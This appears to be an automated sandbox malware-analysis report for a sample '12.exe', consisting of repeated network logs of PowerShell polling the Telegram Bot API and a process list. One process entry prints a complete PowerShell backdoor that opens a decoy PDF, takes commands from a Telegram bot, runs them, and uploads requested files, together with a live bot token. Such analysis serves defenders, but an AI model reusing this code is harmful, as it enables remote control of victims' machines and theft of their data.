                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.564983149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:36 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:36 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:36 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:36 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.564984149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:39 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:39 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:39 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:39 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.564985149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:42 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:45 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:45 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:45 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.564986149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:48 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:50 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:50 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:50 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.564987149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:00 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:03 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:03 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:03 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.564988149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:05 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:05 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:05 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:05 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.564989149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:06 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:08 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:08 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:08 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.564990149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:14 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:19 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:19 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:19 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.564991149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:20 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:20 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:20 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:20 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.564992149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:30 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:35 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:34 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:35 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.564993149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:40 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:40 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:40 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:40 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.564994149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:43 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:43 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:43 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:43 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.564995149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:06:46 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:06:46 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:06:46 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:06:46 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:04:03:39
                                                                                Start date:14/01/2025
                                                                                Path:C:\Users\user\Desktop\12.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\12.exe"
                                                                                Imagebase:0x7ff73a3f0000
                                                                                File size:232'448 bytes
                                                                                MD5 hash:90F2CA0A38D6E5416EE2F6BE6326521D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:1
                                                                                Start time:04:03:40
                                                                                Start date:14/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e '$ T o k e n   =   " 7 5 5 4 3 0 7 6 6 9 : A A E _ l n Q T Y S X v u s a K l k p N r v 2 D v Y u C 7 H h I 0 s 0 "  
 $ U R L   =   " h t t p s : / / a p i . t e l e g r a m . o r g / b o t { 0 } "   - f   $ T o k e n  
 $ l a s t I D   =   1 2 3  
 $ s l e e p T i m e   =   2  
 $ i d e n t i f i e r   =   - j o i n   ( ( 4 8 . . 5 7 )   |   G e t - R a n d o m   - C o u n t   5   |   %   { [ c h a r ] $ _ } )  
  
 f u n c t i o n   I n v o k e - B o t C m d   {  
         p a r a m   (  
                 $ c o m m a n d  
         )  
         t r y   {  
                 $ r e s u l t   =   I n v o k e - E x p r e s s i o n ( $ c o m m a n d )  
         }  
         c a t c h   {  
                 $ r e s u l t   =   $ E r r o r [ 0 ] . E x c e p t i o n  
         }  
         $ r e s   =   " [ $ i d e n t i f i e r ] % 0 D % 0 A "  
         $ r e s u l t   |   F o r E a c h - O b j e c t   { $ r e s   + =   [ s t r i n g ] $ _   +   " % 0 D % 0 A " }  
  
         i f ( $ r e s   - e q   " " ) {  
                 $ l a s t I D   =   $ u p d a t e i d  
                 c o n t i n u e  
         }  
         i f ( $ r e s . L e n g t h   - g t   4 0 9 5 ) {  
                 f o r   ( $ i   =   0 ;   $ i   - l t   $ r e s . L e n g t h   /   4 0 9 5 ;   $ i + + )   {  
                         $ b e g i n   =   $ i   *   4 0 9 5  
                         $ e n d   =   $ b e g i n   +   4 0 9 4  
                         i f ( $ e n d   - g t   $ r e s . L e n g t h ) {  
                                 $ e n d   =   $ r e s . L e n g t h  
                         }  
                         $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = "   +   $ r e s [ $ b e g i n . . $ e n d ]  
                         $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                         I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
                 }  
         }   e l s e   {  
                 $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = $ r e s "    
                 $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                 I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
         }  
 }  
  
 f u n c t i o n   I n v o k e - B o t D o w n l o a d   {  
         p a r a m   (  
                 $ F i l e P a t h  
         )  
         A d d - t y p e   - A s s e m b l y N a m e   S y s t e m . N e t . H t t p  
         $ F i e l d N a m e   =   ' d o c u m e n t '  
         $ h t t p C l i e n t H a n d l e r   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p C l i e n t H a n d l e r  
         $ h t t p C l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p c l i e n t   $ h t t p C l i e n t H a n d l e r  
  
         $ F i l e S t r e a m   =   [ S y s t e m . I O . F i l e S t r e a m ] : : n e w ( $ F i l e P a t h ,   [ S y s t e m . I O . F i l e M o d e ] : : O p e n )  
         $ F i l e H e a d e r   =   [ S y s t e m . N e t . H t t p . H e a d e r s . C o n t e n t D i s p o s i t i o n H e a d e r V a l u e ] : : n e w ( ' f o r m - d a t a ' )  
         $ F i l e H e a d e r . N a m e   =   $ F i e l d N a m e  
         $ F i l e H e a d e r . F i l e N a m e   =   ( S p l i t - P a t h   $ F i l e P a t h   - l e a f )  
         $ F i l e C o n t e n t   =   [ S y s t e m . N e t . H t t p . S t r e a m C o n t e n t ] : : n e w ( $ F i l e S t r e a m )  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t D i s p o s i t i o n   =   $ F i l e H e a d e r  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t T y p e   =   [ S y s t e m . W e b . M i m e M a p p i n g ] : : G e t M i m e M a p p i n g ( $ F i l e P a t h )    
          
         $ M u l t i p a r t C o n t e n t   =   [ S y s t e m . N e t . H t t p . M u l t i p a r t F o r m D a t a C o n t e n t ] : : n e w ( )  
         $ M u l t i p a r t C o n t e n t . A d d ( $ F i l e C o n t e n t )  
          
         $ h t t p C l i e n t . P o s t A s y n c ( " $ U R L / s e n d D o c u m e n t ? c h a t _ i d = $ f r o m " ,   $ M u l t i p a r t C o n t e n t )   >   $ n u l l  
 }  
  
 w h i l e   ( $ t r u e )   {  
         t r y {  
                 $ i n M e s s a g e   =   I n v o k e - R e s t M e t h o d   - M e t h o d   G e t   - U r i   ( $ U R L   + ' / g e t U p d a t e s ? o f f s e t = '   +   ( $ l a s t I D   +   1 ) )   - E r r o r A c t i o n   S t o p  
         }  
         c a t c h   {  
                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )    
                 c o n t i n u e  
         }  
         $ i n M e s s a g e . r e s u l t   |   F o r E a c h - O b j e c t   {  
                 $ u p d a t e i d   =   $ _ . u p d a t e _ i d  
                 $ f r o m   =   $ _ . m e s s a g e . f r o m . i d  
                 $ c o m m a n d   =   [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ _ . m e s s a g e . t e x t ) )  
  
                 i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   6 )   - e q   " / s l e e p " ) {  
                         $ s l e e p T i m e   =   [ i n t ] $ c o m m a n d . S u b s t r i n g ( 7 )  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   4 )   - e q   " / c m d " ) {  
                         $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 5 )                          
                         I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   9 )   - e q   " / d o w n l o a d " ) {  
                         $ F i l e P a t h   =   $ c o m m a n d . S u b s t r i n g ( 1 0 )          
                         I n v o k e - B o t D o w n l o a d   - F i l e P a t h   $ F i l e P a t h          
                 }  
                 e l s e   {  
                         $ c m d   =   $ c o m m a n d . S u b s t r i n g ( 1 ,   5 )  
                         i f ( $ i d e n t i f i e r   - e q   $ c m d ) {  
                                 $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 7 )  
                                 I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                         }  
                         e l s e   {  
                                 W r i t e - H o s t   " S L E E P "  
                                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )  
                         }  
                 }  
                 $ l a s t I D   =   $ u p d a t e i d                
         }  
         S t a r t - S l e e p   - S e c o n d s   $ s l e e p T i m e  
 } '"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:2
                                                                                Start time:04:03:40
                                                                                Start date:14/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:04:03:41
                                                                                Start date:14/01/2025
                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"
                                                                                Imagebase:0x7ff686a00000
                                                                                File size:5'641'176 bytes
                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:5
                                                                                Start time:04:03:42
                                                                                Start date:14/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
